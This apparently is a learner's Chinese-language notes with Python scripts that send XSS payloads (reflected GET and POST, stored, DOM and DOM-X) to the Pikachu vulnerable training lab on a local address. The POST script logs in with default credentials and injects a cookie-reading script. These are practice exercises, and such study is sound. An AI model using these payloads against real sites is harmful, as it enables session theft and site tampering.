xss反射性get,
post,
存储型xss,
dom,
dom-x
#DOM型的xss注入点在HTML内容节点,用标签/事件执行JS,DOM-X型注入点在HTML标签熟悉如(href),需要闭合属性引导,再注入恶意代码import requests
url = "http://192.168.8.1/pikachu-master/vul/xss/xss_reflected_get.php"
payload = "<script>alert('1')</script>"
params = {
"message":payload,
"submit":"submit"
}
resp = requests.get(url,params=params)
print("="*50)
print("[+] 注入完成!")
print("检测漏洞是否注入成功: ",payload in resp.text)import requests
r = requests.Session()
log_url = "http://192.168.8.1/pikachu-master/vul/xss/xsspost/post_login.php"
url = "http://192.168.8.1/pikachu-master/vul/xss/xsspost/xss_reflected_post.php"
data = {
"username":"admin",
"password":"123456",
"submit":"Login"
}
resp = r.post(log_url, data=data) #只需要保持会话,不需要内容就不用resp
payload = "<script>alert(document.cookie)</script>"
data2 = {
"message":payload,
"submit":"submit"
}
resp2 = r.post(url,data=data2)
print("[+] 语句已注入")
print("查询页面是否注入: ",payload in resp2.text)#注意看查询的resp2不是登录的resp小错误import requests
url = "http://192.168.8.1/pikachu-master/vul/xss/xss_stored.php"
payload = "<script>alert('xss')</script>"
data = {
"message":payload,
"submit":"submit"
}
resp = requests.post(url, data=data)
print("[+] 完成注入!")
print("[+] 查看是否注入成功:",payload in resp.text)import requests
url = "http://192.168.8.1/pikachu-master/vul/xss/xss_dom.php"
payload = "'><img src='' onerror='alert(1)'/>"
params = {"text":payload}
resp = requests.get(url,params=params)
print("[+] 注入完成!")
print("[+] 攻击url: ",resp.url)#DOM型的xss注入点在HTML内容节点,用标签/事件执行JS,DOM-X型注入点在HTML标签熟悉如(href),需要闭合属性引导,再注入恶意代码
import requests
url = "http://192.168.8.1/pikachu-master/vul/xss/xss_dom_x.php"
payload = "'><img src='' onerror='alert(1)'/>"
resp = requests.get(url,params = {"text":payload})
print("[+] 完成注入! ")
print(f"点击链接:{url}?text={payload}")
print(f" 查看回显 ")